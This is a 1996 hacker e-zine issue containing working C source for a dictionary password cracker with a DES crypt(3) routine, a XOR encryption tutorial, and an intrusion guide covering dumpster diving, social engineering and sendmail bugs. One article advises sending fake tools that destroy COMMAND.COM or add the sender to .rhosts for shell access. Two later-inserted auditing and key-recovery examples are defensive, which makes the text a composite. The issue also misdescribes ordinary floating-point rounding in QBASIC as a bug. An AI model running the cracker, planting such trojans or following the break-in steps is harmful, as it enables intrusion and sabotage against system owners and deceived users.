UTOPIA
April 1996
PUBLISHED BY: Utopium
Utopia (yoo-to-pi-a), noun 1. an imaginary island described as the place of
perfect moral and social conditions. 2. any place of perfection. 3. any
visionary plan for a perfect system of living.
Disclaimer:
Everything within this publication is purely for informational purposes.
By reading this you take sole responsibility for any consequences. I or any
place that stores this publication take no responsibility for any actions.
All information here is subject to and protected by the First Amendment of the
Constitution of the United States. There is no guarantee on any information in
here. If you feel that any information here may be offensive or illegal within
your country then stop reading now.
Part 1 . . . . . . . . . . . . . . Introduction
Part 2 . . . . . . . . . . . . . . Source Code To A Simple Password Cracker
Part 3 . . . . . . . . . . . . . . Hackers In Reality
Part 4 . . . . . . . . . . . . . . XOR Encryption By Example
Part 5 . . . . . . . . . . . . . . So You Got A Lamer On Your Back
Part 6 . . . . . . . . . . . . . . Information Gathering
+ ------------ +
| Introduction |
+ ------------ +
By Utopium
Issue two is finally here and a lot has changed since. My hard drive got
screwed and I lost a bunch of files and I am a little bored since I've been
reading a bunch of tech manuals and books lately. The world is pretty much the
same though and I'm not much caring about the latest developments going on in
computers right now. Anyway, just plain old life as usual.
Right now I got myself into an interest of encryption and have been
getting source code and information on the subject. I even have a small
article here on XOR encryption if you are interested. I found that
ripem.msu.edu has a great deal of files on encryption so feel free to check it
out for yourself.
One thing that I am amazed at is mathematical bugs that keep popping up
in software I use. The latest one I found was in QBASIC which comes with
MS-DOS and it's a simple problem with addition. Run this line of code:
PRINT 3.26 + 3.25 + 2.55
And you get the result 9.059999. I find this a bit funny that the guys at
Microsoft have this error in something as simple as addition. Makes you hope
that they don't sell software to NASA to pilot the space shuttle. But I figure
that nothing is perfect and you can never get all the bugs out of everything.
At least it keeps us hackers busy.
Enough with the boring talk now so read on and enjoy issue 2 of Utopia. If
you want to submit any articles, information, or letters I can publish, mail me
at utopium@cyberspace.org and you can find copies of Utopia at ftp.fc.net under
/pub/defcon/UTOPIA if you want to look for other issues. I'd appreciate any
contributions as I really don't have the time to write this whole thing so if
anyone out there wants to help me keep this publication going please send in
those articles.
############################################
# Source Code To A Simple Password Cracker #
############################################
In the past you have probably just been slapping those passwd files into
Cracker Jack or some other password cracker and not really bothered to wonder
how they work. Well for those of you who are interested, I have some simple
source code you can look at here to understand how they work. I'm assuming
that you have some basic understanding of the C language so you can read this
without a problem. I also included a version of crypt(3) that works in every
compiler I tried it in so you shouldn't have much of a problem porting this
program to any platform you want. This might even run in Windows if you had a
C compiler for it :). I recommend that you get ufc-crypt, though, because
it's a lot faster and more efficient. Tinker around though and maybe you can really
build a high quality program for yourself.
--BEGIN CRACK.C--
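#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* crypt() is defined in CRYPT.C below */
char *crypt(char *pw, char *salt);

/* Read one passwd line into a and split it: c = account name, d = password
   field. Both are set to NULL at end of file. */
#define fetch(a,b,c,d) { if(fgets(a,130,b)){ c=strtok(a,":"); d=strtok(NULL,":"); } else c=d=NULL; }

/* Prompt for a file name and open it; give up if it cannot be opened */
FILE *ask(char *prompt,char *mode){
    char i[130];
    FILE *f;
    printf("%s",prompt);
    if(!fgets(i,sizeof i,stdin)) exit(1);
    i[strcspn(i,"\n")]=0;
    if(!(f=fopen(i,mode))){ perror(i); exit(1); }
    return f;
}

int main(void){
    FILE *p,*o,*w;
    char pes[130],pws[130];
    char *es=pes,*as,*ps,*ws=pws;

    p=ask("Password File: ","r");
    w=ask("WordList File: ","r");
    o=ask("Results File : ","w");

    /* strtok() skips the empty field in "user::", so the character just
       before the next token is still ':' when there is no password */
    fprintf(o,"*** PASS 1: NULL PASSWORDS ***\n");
    do {
        fetch(es,p,as,ps);
        if(ps) if(ps[-1]==':')
            fprintf(o,"| User [%s] has no password!\n",as);
    }
    while(ps);
    fflush(o);
    rewind(p);

    /* try each account name as its own password */
    fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");
    do {
        fetch(es,p,as,ps);
        if(ps) if(!strcmp(crypt(as,ps),ps))
            fprintf(o,"| User [%s] has password [%s]\n",as,as);
    }
    while(ps);
    fflush(o);
    rewind(p);

    /* try every word in the word list against every account */
    fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");
    do{
        fetch(es,p,as,ps);
        if(!ps) break;
        rewind(w);
        while(fgets(ws,sizeof pws,w)){
            ws[strcspn(ws,"\n")]=0;
            if(!strcmp(crypt(ws,ps),ps)){
                fprintf(o,"| User [%s] has password [%s]\n",as,ws);
                fflush(o);
                break;
            }
        }
    }
    while(ps);
    fprintf(o,"*** FINISHED SESSION ***\n");
    fclose(o);
    return 0;
}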
--END CRACK.C--
--BEGIN CRYPT.C--
#include <string.h>
/*
* asc_bin_conv() macro translates a ascii character to
* a 6-bit binary number. Used to translate salts.
*/
#define asc_bin_conv(x) x >= 'a' ? x - 59 : (x >= 'A' ? x - 53 : x - 46 )
/* output_conv[] table is used for the reverse translation */
const char output_conv[] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/*
* These tables are a part of the original DES specification
*/
/* Key permutation PC1 */
const unsigned char PC1[56] =
{ 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4};
/* Key schedule of left shifts LS */
const unsigned char LS[16] =
{ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1};
/* Key permutation PC2 */
const unsigned char PC2[56] =
{ 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32};
/* Bit selection table E */
const unsigned char SE[48] =
{ 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1};
/* Permutation P */
const unsigned char P[32] =
{ 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25};
/* Selection functions ('S-boxes') */
const unsigned char S[8][4][16] =
{ { { 14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7 },
{ 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8 },
{ 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0 },
{ 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13 } },
{ { 15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10 },
{ 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5 },
{ 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15 },
{ 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9 } },
{ { 10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8 },
{ 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1 },
{ 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7 },
{ 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12 } },
{ { 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15 },
{ 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9 },
{ 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4 },
{ 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14 } },
{ { 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9 },
{ 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6 },
{ 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14 },
{ 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3 } },
{ { 12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11 },
{ 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8 },
{ 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6 },
{ 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13 } },
{ { 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1 },
{ 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6 },
{ 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2 },
{ 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12 } },
{ { 13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7 },
{ 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2 },
{ 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8 },
{ 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 } }
};
/* Final permutation IP^-1 */
const unsigned char FP[64] =
{ 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25};
/* 64-bit bitvector type */
typedef unsigned char vec64[64];
/* return buffer */
static char crypt_return[16];
/* interfaced as the UNIX crypt() */
char *crypt (char *pw, char *salt)
{
    int i,j,s,t,cs,l,sb,p1,p2;
    char *ret;
    vec64 B,K,T,T2;
    unsigned char KP[16][48];
    unsigned char E[48];

    /* Convert pw into a bitvector */
    memset (K, 0, 64);
    for( i = 0; (i < 64) && (*pw != '\0'); pw++ )
    {
        K[i++] = (*pw >> 6) & 1;
        K[i++] = (*pw >> 5) & 1;
        K[i++] = (*pw >> 4) & 1;
        K[i++] = (*pw >> 3) & 1;
        K[i++] = (*pw >> 2) & 1;
        K[i++] = (*pw >> 1) & 1;
        K[i++] = *pw & 1;
        i++;
    }

    /*
     * combine PC1, LS and PC2 - tables into one for key generation
     * KP[i][j] is used to generate the iteration key K_i
     */
    cs = 0;
    for (i = 0; i < 16; i++)
    {
        cs += LS[i];
        for (j = 0; j < 48; j++)
        {
            l = PC2[j] - 1;
            l = (l < 28) ? (l+cs) % 28 : (l+cs) % 28 + 28;
            KP[i][j] = PC1[l]-1;
        }
    }

    /* copy salt to the beginning of the return buffer */
    ret = crypt_return;
    *ret++ = salt[0];
    *ret++ = salt[1];

    /*
     * permute the E table according to the salt value
     * this is the only actual change in the DES algorithm!
     */
    s = ((asc_bin_conv(salt[1])) << 6) | (asc_bin_conv(salt[0]));
    memcpy(E, SE, 48);
    for( i = 0; i < 12; i++)
        if (((s >> i) & 1) != 0)
        {
            t = E[i];
            E[i] = E[i+24];
            E[i+24] = t;
        }

    memset (T, 0, 64);                  /* all zero : no need for IP */
    for (cs = 0; cs < 25; cs++)         /* DES is called 25 times */
        for (i = 0; i < 16; i++)        /* 16 DES iterations */
        {
            /* do PC1-LS-PC2 key-shuffle and xor with the E-expanded left side */
            for (j = 0; j < 48; j++)
                B[j] = T[E[j]+31] ^ K[KP[i][j]];

            /* do sbox - substitution */
            p1 = 0;
            p2 = 3;
            for (j = 0; j < 8; j++)
            {
                sb = S[j][(B[p1] << 1) | B[p1+5]]
                         [(B[1+p1] << 3) | (B[2+p1] << 2) | (B[3+p1] << 1) | B[4+p1]];
                for (l = 0; l < 4; l++)
                    T2[p2-l] = (sb >> l) & 1;
                p1 += 6;
                p2 += 4;
            }

            /* permutation P and xor with the right side */
            for (j = 0; j < 32; j++)
                T[j] ^= T2[P[j]-1];

            /* swap the halves (not in the last iteration!) */
            if (i != 15)
                for (j = 0; j < 32; j++)
                {
                    l = T[j];
                    T[j] = T[j+32];
                    T[j+32] = l;
                }
        }

    /* final permutation IP^-1 */
    memcpy(T2, T, 64);
    for(i = 0; i < 64; i++)
        T[i] = T2[FP[i]-1];

    /* Output conversion */
    for (i = 0; i < 60; i += 6 )
        *ret++ = output_conv[ T[i] << 5 | T[i+1] << 4 | T[i+2] << 3 |
                              T[i+3] << 2 | T[i+4] << 1 | T[i+5] ];

    /* the last character has only 4 bits */
    *ret++ = output_conv[T[60] << 5 | T[61] << 4 | T[62] << 3 | T[63] << 2];

    /* return */
    *ret++ = '\0';
    return crypt_return;
}
--END CRYPT.C--
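An added example, not part of the original issue: an auditing routine a system administrator could run over passwd-style lines to flag the two conditions CRACK.C depends on, empty password fields and traditional 13-character crypt(3) hashes built from the output_conv[] alphabet. It splits on colons by hand because strtok() collapses empty fields (the reason CRACK.C has to test ps[-1]). The names classify_line and count_findings and the sample lines are constructed for illustration, and recognising `$`-prefixed hashes goes beyond what the article covers.

```c
#include <stdio.h>
#include <string.h>

enum pw_class { PW_MALFORMED, PW_EMPTY, PW_DES, PW_MODULAR, PW_NOHASH };

/* Alphabet traditional crypt(3) uses for its salt and hash characters */
static const char CRYPT64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Constructed sample lines (not from a real system; hashes are placeholders) */
static const char *SAMPLE[] = {
    "root:x:0:0:root:/root:/bin/sh",
    "guest::500:500:Guest:/home/guest:/bin/sh",
    "alice:ab0123456789A:501:501:Alice:/home/alice:/bin/sh",
    "bob:$6$examplesalt$placeholder:502:502:Bob:/home/bob:/bin/sh",
    "daemon:*:1:1:daemon:/:/bin/false",
    "not a passwd line"
};
#define NSAMPLE (sizeof SAMPLE / sizeof SAMPLE[0])

/* Classify the password field (second colon-separated field) of one line.
 * If user is not NULL the account name is copied into it (ulen bytes). */
enum pw_class classify_line(const char *line, char *user, size_t ulen)
{
    const char *c1 = strchr(line, ':');
    const char *c2 = c1 ? strchr(c1 + 1, ':') : NULL;
    size_t n, flen;
    if (!c1 || !c2 || c1 == line)
        return PW_MALFORMED;
    if (user && ulen) {
        n = (size_t)(c1 - line);
        if (n >= ulen) n = ulen - 1;
        memcpy(user, line, n);
        user[n] = '\0';
    }
    flen = (size_t)(c2 - c1) - 1;
    if (flen == 0)
        return PW_EMPTY;        /* "user::" logs in without a password */
    if (c1[1] == '$')
        return PW_MODULAR;      /* $id$salt$hash schemes such as $1$ or $6$ */
    if (flen == 13 && strspn(c1 + 1, CRYPT64) == 13)
        return PW_DES;          /* 2 salt characters + 11 hash characters */
    return PW_NOHASH;           /* "*", "x", "!": no usable hash in this file */
}

/* Count the entries to fix first: accounts with no password and accounts
 * still protected only by 13-character DES crypt.  Prints a report if asked. */
int count_findings(const char **lines, size_t n, int report)
{
    static const char *label[] = { "malformed", "EMPTY PASSWORD",
        "legacy DES crypt", "modular crypt", "no hash in this file" };
    char user[64];
    size_t i;
    int findings = 0;
    for (i = 0; i < n; i++) {
        enum pw_class c = classify_line(lines[i], user, sizeof user);
        if (c == PW_EMPTY || c == PW_DES)
            findings++;
        if (report && c != PW_MALFORMED)
            printf("%-8s %s\n", user, label[c]);
    }
    return findings;
}

int main(void)
{
    printf("%d entries need attention\n", count_findings(SAMPLE, NSAMPLE, 1));
    return 0;
}
```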
(*)(*)(*)(*)(*)(*)(*)(*)
(*)Hackers in Reality(*)
(*)(*)(*)(*)(*)(*)(*)(*)
[By Utopium]
The Mentor probably gave one of the best descriptions of hackers when he
wrote the Hacker Manifesto. Unfortunately, some people are not taking it
seriously and there is a lot of confusion and craziness about hackers today. I
thought I would write something about this because I am sick of all the stupid
things being said about hackers and want some people to understand.
Any of you out there that don't know anything about hackers and are
somehow reading this, my guess is that you see us as criminals who transfer
money from banks and steal top secret information from military sites. Sorry
to say but we are not criminals like that. Those things are what spies and bank
robbers do. If you hear something on the news about a hacker doing these
things or some other malicious acts, that's just the media and law enforcement
officials making the image.
For those who are not technically smart, or lamers, I just want you to
stop calling yourselves hackers because you are making things worse. Many of
you roam around America Online and use AOHell and programs like it,
claiming that you are elite because you talk cool and run lots of macros. You
fill newsgroups with bogus and often pathetic comments and information. You
even now get search engines like Yahoo! to have your own section where people
think you are real hackers because you have lots of graphics and anarchy
files. Lamers like you are what cause the rest of the world to think that we
are immature, evil, and even criminal. You all need to stop what you're doing
and become real hackers if you want to call yourself one.
What the hell do I define a hacker as? Overall I think of a hacker as
someone who wants to learn how computers and networks operate. We use our
skills in accessing systems to further our knowledge and understanding. We
don't mean any real harm to anyone and even would like to help others with our
knowledge. Hacking is a lifestyle in which you are only judged by your mind and
not what type of person you are and where you are from.
Honestly I know some things may sound pretty stupid in this article but I
just have to get this out because the world today is making me sick on how
they view and treat hackers. Writing this won't change the world but hopefully
it will influence a few people on what reality is.
* * * * * * * * * * * * * * *
* XOR Encryption By Example *
* * * * * * * * * * * * * * *
* By: Utopium *
* * * * * * * *
For those of you who are still somewhat new to computers you probably
have never heard of XOR. The Exclusive OR system was first used in assembly
language for bit manipulation but has now been made to work in many
programming languages. What XOR does is compare two numbers in binary form and
returns a new number based on the results of the first two numbers. Any bits
in the same position with the same value are set to 0 while any that have
different values are set to 1. Here's an example of how it works:
00000101 (5) XOR 00000110 (6) = 00000011 (3)
You can see this is pretty simple and can be done on paper if you wanted
to do it that way. XORing 5 with 6 gives 3 because the third bit has the same
value in both numbers while the first and second bits differ. I could go into
more detail about bit manipulation but that should be left for when you want
to get deeper into programming.
You should see how encryption works into this by now. By XORing a number
with a certain key value you obscure it until you XOR it with the same key
again to decrypt the data. There is no need to make separate encryption and
decryption functions, as XORing the encrypted data with the same key value
will return it to its original form. You can try this yourself by taking the
example and XORing 3 by 6 to find that the result will be 5. This can make
things pretty convenient.
Now to be honest with you, this encryption is very insecure and anyone
can make a simple program that will break it in minutes so you don't want to
use this to encrypt confidential or personal information. So why would you use
this? Well when you encrypt certain data within a program like a cheat code in
a game or a password it makes it a lot tougher to crack since you can't just
simply crack a whole executable file. Lots of shareware authors use this for
the registration codes they have and virus writers can evade virus scanners
better by encrypting certain instruction code. Using this you can make sure no
one can easily see data you don't want them to see in your programs.
I made a little program in BASIC which does simple encryption on a text
file by taking a password and modifying the number value of it to something
that can be used in this simple program. Here's the source:
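' Ask for the file names and the password
LINE INPUT "Input File: ", inf$
LINE INPUT "Output File: ", outf$
LINE INPUT "Password: ", passwd$
OPEN inf$ FOR INPUT AS #1
OPEN outf$ FOR OUTPUT AS #2
' Add up the character codes of the password
FOR n = 1 TO LEN(passwd$)
    pn = pn + ASC(MID$(passwd$, n, 1))
NEXT n
' Halve the total until it fits in one byte (the 8-bit key)
WHILE pn > 255
    pn = INT(pn / 2)
WEND
' XOR each character of the input with the key and write it out
WHILE NOT EOF(1)
    bscd$ = INPUT$(1, 1)
    PRINT #2, CHR$(ASC(bscd$) XOR pn);
WEND
CLOSE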
As you can see this is pretty simple and small so it shouldn't be hard to
implement into whatever you want. This uses an 8-bit key but if you want
something a little more secure you can have a 16 or 32-bit key and encrypt
data in blocks of the same size as the key. Encrypting multiple times using
different keys each time can also bring a little more security if needed.
Using this method of encryption on your programs can be very helpful for
any situation. This is just a small example of encryption which you can make
probably as powerful as the DES or IDEA methods. Experiment with this a little
and you should be able to add that little feature you just needed on your
programs.
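An added example in C, not part of the original issue: it ports the key derivation and XOR step of the BASIC program and shows why the article calls the scheme very insecure. Different passwords collapse onto the same one-byte key, and the key can be found from the ciphertext alone by trying all 256 values. The function names, the scoring rule and the sample text are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>

/* Same key derivation as the BASIC listing: add up the character codes,
 * then halve the sum until it fits in one byte.  Any sum above 255 ends
 * up between 128 and 255, and the order of the characters is lost. */
unsigned char derive_key(const char *passwd)
{
    unsigned long pn = 0;
    while (*passwd)
        pn += (unsigned char)*passwd++;
    while (pn > 255)
        pn /= 2;
    return (unsigned char)pn;
}

/* XOR every byte with the key; running it twice restores the input. */
void xor_buf(unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;
    for (i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Score how much the data looks like English text under a trial key:
 * spaces and lower-case letters count most, unprintable bytes count against. */
static long score_text(const unsigned char *ct, size_t len, unsigned char key)
{
    long score = 0;
    size_t i;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)(ct[i] ^ key);
        score += (c == ' ' || islower(c)) ? 2 : isprint(c) ? 1 : -5;
    }
    return score;
}

/* Try all 256 keys and keep the one whose output scores highest. */
unsigned char recover_key(const unsigned char *ct, size_t len)
{
    int k, best = 0;
    long s, best_score = score_text(ct, len, 0);
    for (k = 1; k < 256; k++) {
        s = score_text(ct, len, (unsigned char)k);
        if (s > best_score) { best_score = s; best = k; }
    }
    return (unsigned char)best;
}

/* Encrypt a constructed sample with a password-derived key, then find the
 * key again from the ciphertext alone.  Returns 1 if the key was found. */
int demo(const char *passwd)
{
    unsigned char buf[] = "this text was scrambled with a one byte xor key";
    size_t len = sizeof buf - 1;
    unsigned char key = derive_key(passwd), found;
    xor_buf(buf, len, key);
    found = recover_key(buf, len);
    xor_buf(buf, len, found);
    printf("\"%s\" -> key %d, recovered %d: %s\n", passwd, key, found, (char *)buf);
    return found == key;
}

int main(void)
{
    /* "secret" and "terces" are different passwords with the same key */
    return demo("secret") && demo("terces") ? 0 : 1;
}
```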
=================================
So You Got A Lamer On Your Back
=================================
Don't you just hate it when you have some idiot on your back who keeps
bothering you? You just get real annoyed and start flaming him and he flames
you back for stupid reasons and he seems to just make you want to go nuts.
Well don't get too angry, because there are better ways to get rid of the pest.
For those really annoying lamers who go "Can someone send me a program to
change my grades?" or "Send me k-rad warez so I can hack the Pentagon and be
31337!" you should stop and think for a minute. If you want them to leave you
alone, give them what they want. Obviously there are no such programs to do
these things, all you really got to do is make it look like it does something
while it really just screws them over. Something that kills their COMMAND.COM
or something else should cut them off for a while as they complain to someone
else or try and actually learn how to use a computer. Once you slapped this
together just send it off with a little friendly note on how to use the
program and you shouldn't have to worry about them.
Lamers on IRC can be the worst as they may have some bots that go crazy
and think they are powerful because their nick has alternating upper and lower
case letters. Some seem to actually know enough to be on a shell account and
use a simple IRC client, but they don't know much more than that. If they were
to ask you for a bot or some other script they could use, be nice and DCC one
over. Make sure that you have a ready made script which when they run, will
modify their .rhosts file to instantly let you in their shell. Now you can
have fun doing whatever you feel in their shell.
One thing strange is that lamers like to collect information which can
actually be of some use. You may be in need of this but they say that they
need something big in exchange. Just as before, give them what they want. Act
pleasant and give them bogus data saying it is information on military sites. A
number of people can be fooled by the simple output of a netstat or some other
information service. If it's enough beyond their understanding they will
probably fall for it and send that info you needed.
You don't need to talk harshly or annoy a lamer back in order to be rid
of their presence, a kinder approach can be the best. Using this guise can
help greatly in taking care of your problems. Just have a little imagination
and you should come up with a number of ideas to keep a peaceful hacker life.
/-----------------------\
| INFORMATION GATHERING |
\-----------------------/
\ BY: UTOPIUM /
\_____________/
You know I get real annoyed when I see a post by someone asking to get
a program to hack any computer they want or want someone to teach them to hack
within a few hours. If you're one of those people you better read this or one of
the things in the previous article may happen to you.
When you want to hack a system, you first need to find out what you're dealing
with. Say it's some internet provider which gets on your nerves or a company
which has some things in their drives that interest you. Whatever it is you
must be able to understand the system in order to use it.
If the place is nearby you'll want to go there and scout around. Hang
around the building and see what you can see at desks or other places. Trashing
is something that will help out a lot. Finding documents on certain ways of
accessing their network and info on what kind of operating system is run are
the most crucial things. Also find information about what they do and anything
like that. If you want to get even more information, do a little social
engineering from phone numbers you found trashing and also do mail requests for
information if they make it freely available.
Once you have all this, you'll want to do some information searching on
the computer to learn more about the actual software and protocols. The WHOIS
service can easily give some data like other sites, names, and e-mail addresses
of superusers. Use finger extensively by first doing something like finger
@host.com and then fingering root, sysadm, and any other users you know of so
as to obtain information on what a password could possibly be, or a phone number
a user may place in their .plan file, which can be used for social engineering.
Since the web is also expanding to include almost anything imaginable, check
out the site's web pages and learn more about how they are organized and such.
Now that you have gathered data on the types of operating systems and
networks, a little research is in order. If you don't know about the systems
they use find any documentation you can get your hands on. But if you already
know a good deal, it's still a good idea to brush up as to not make any
mistakes.
With all this knowledge in your head, it's time to break in. There are
various methods for this such as simply guessing passwords or using a bug in a
certain service they have like sendmail. After successfully breaching their
security in this method, you can freely explore and hack your way into higher
levels of access.
All you need to know when doing all of this is that you need to obtain
as much information as you can on your goal. With a little dedication and
creativity, you should be able to breach almost any system of your choosing.
What I described here is only an example of the many ways to successfully hack
a computer system.